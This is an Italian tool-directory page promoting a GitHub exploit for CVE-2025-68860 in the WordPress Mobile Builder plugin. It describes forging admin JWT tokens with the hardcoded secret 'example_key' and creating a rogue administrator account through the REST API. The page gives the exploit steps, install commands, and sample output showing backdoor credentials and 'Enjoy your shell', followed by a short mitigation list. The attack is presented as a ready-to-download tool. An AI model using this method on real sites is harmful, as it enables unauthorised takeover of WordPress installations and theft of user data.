Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2025-68860 — Script di exploit per CVE-2025-68860 che colpisce il plugin WordPress Mobile Builder. Genera token JWT falsificati utilizzando un segreto hardcoded per autenticarsi come admin e creare nuovi account amministratore tramite l'API REST. | Kitploit
Strumenti/GitHubGitHub/dedsecteam-blackhat/cve-2025-68860
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingAutenticazione
GitHubdedsecteam-blackhat/cve-2025-68860

CVE-2025-68860

Script di exploit per CVE-2025-68860 che colpisce il plugin WordPress Mobile Builder. Genera token JWT falsificati utilizzando un segreto hardcoded per autenticarsi come admin e creare nuovi account amministratore tramite l'API REST.

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
5 mesi faNon ancora revisionato

WordPress Mobile Builder <= 1.4.2 - Broken Authentication (CVE-2025-68860)

Descrizione

Il plugin WordPress Mobile builder versione 1.4.2 e precedenti presenta una vulnerabilità di Broken Authentication che consente a un attaccante di creare token JWT validi utilizzando il segreto predefinito "example_key" e di autenticarsi come admin (user_id=1). Con questo token, l'attaccante può creare un nuovo account amministratore e assumere il controllo del sito.

Dettagli della Vulnerabilità

CVE: CVE-2025-68860

Causa: Utilizzo di una chiave segreta hardcoded "example_key" per JWT, senza una validazione adeguata.

Posizione della Vulnerabilità: Nel plugin Mobile builder, il file che gestisce l'autenticazione JWT (ad esempio class-jwt-auth.php) utilizza la costante JWT_SECRET con valore predefinito 'example_key'. Questo segreto non può essere modificato tramite le impostazioni, quindi un attaccante può creare token per qualsiasi user_id.

Impatto: Un attaccante può creare un token per user_id=1 (admin), accedere agli endpoint REST API e creare un nuovo utente con ruolo amministratore.

CVSS: Alto (punteggio 8.8) - vettore di rete, non richiede interazione con l'utente.

Come Funziona l'Exploit

  1. Lo script crea un token JWT con un payload contenente user_id: 1 (admin) dan secret "example_key".

  2. Il token viene utilizzato per accedere a /wp-json/wp/v2/users/ per verificare l'accesso admin.

  3. Se ha successo, lo script invia una richiesta POST a /wp-json/wp/v2/users per creare un nuovo utente con username dedsec1337, password admin, email [email protected] e ruolo administrator.

  4. L'output mostra le credenziali e la risposta dell'API.

Requisiti

root@kitploit:~
Python 3.6+

Library: requests, PyJWT, colorama

Target WordPress dengan plugin Mobile builder versi <= 1.4.2 yang aktif.

Installazione

root@kitploit:~
git clone https://github.com/username/CVE-2025-68860
cd CVE-2025-68860
pip install -r requirements.txt

Esempio di Output

root@kitploit:~
╔═══════════════════════════════════════════════════════════════════╗
║ WordPress Mobile builder <= 1.4.2 Broken Authentication Exploit  ║
║ CVE-2025-68860   Priority: HIGH                                 ║
║                    Dedsec Team Exploit                           ║
╚═══════════════════════════════════════════════════════════════════╝
Exploit by : Dedsec Team Exploit
Telegram   : @DedsecTeam1337
GitHub     : https://github.com/DedsecTeam-BlackHat

[INFO] CVE-2025-68860 // WordPress Mobile builder Broken Authentication
[INFO] All old exploits/settings are ignored, running this vector only.
Site URL (example: http://target.site): http://localhost/wordpress
[INFO] Generating JWT as admin (user_id=1)...
eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9...
--------------------------------------------------------------
[INFO] Testing JWT at /wp-json/wp/v2/users/me
[SUCCESS] JWT valid! Confirmed admin access.
--------------------------------------------------------------
[INFO] Creating admin account using exploit...
[INFO] Exploiting, please wait...
[SUCCESS] ✅ Admin user created successfully!

==============[ New Admin Credentials ]==============
Username : dedsec1337
Password : admin
Email    : [email protected]
===================================================

Full API response:
{
  "id": 3,
  "username": "dedsec1337",
  "name": "dedsec1337",
  "email": "[email protected]",
  "roles": ["administrator"]
}
--------------------------------------------------------------
[SUCCESS] Exploit finished. Enjoy your shell.
...

Pericoli

  1. Un attaccante può creare un nuovo account amministratore, accedere a tutte le funzionalità di WordPress, installare plugin dannosi, modificare i contenuti, rubare i dati degli utenti o utilizzare il sito per ulteriori attacchi.

  2. Questa vulnerabilità può essere sfruttata da remoto senza autenticazione preliminare.

  3. Impatto: compromissione totale del sito WordPress.

Mitigazione

  1. Aggiorna immediatamente il plugin Mobile builder all'ultima versione (>=1.4.3).

  2. Se non è disponibile un aggiornamento, disattiva temporaneamente il plugin.

  3. Controlla se sono presenti utenti sospetti sul tuo sito.

  4. Utilizza un web application firewall (WAF) per bloccare richieste sospette verso gli endpoint REST API.

  5. Come misura temporanea, modifica la chiave segreta nel codice del plugin (se possibile) e limita l'accesso alla REST API.

Scarica lo strumento